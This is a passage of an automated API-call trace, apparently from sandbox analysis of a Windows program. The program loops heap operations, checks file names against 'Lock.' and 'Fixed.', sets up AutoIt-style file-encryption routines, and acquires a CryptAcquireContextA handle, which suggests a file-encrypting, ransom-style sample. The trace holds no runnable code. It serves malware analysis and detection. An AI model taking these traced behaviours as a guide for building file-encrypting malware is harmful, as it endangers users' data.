lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0269.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0269.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0269.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0269.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0269.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.289] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0269.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.289] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.289] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xe07e8, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87290 [0269.289] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0269.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.290] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.290] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.290] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.290] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.295] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0269.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0269.295] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.301] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.301] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0269.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.302] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0269.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0269.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0269.303] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699c8 [0269.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0269.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.303] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0269.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.304] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0269.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0269.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 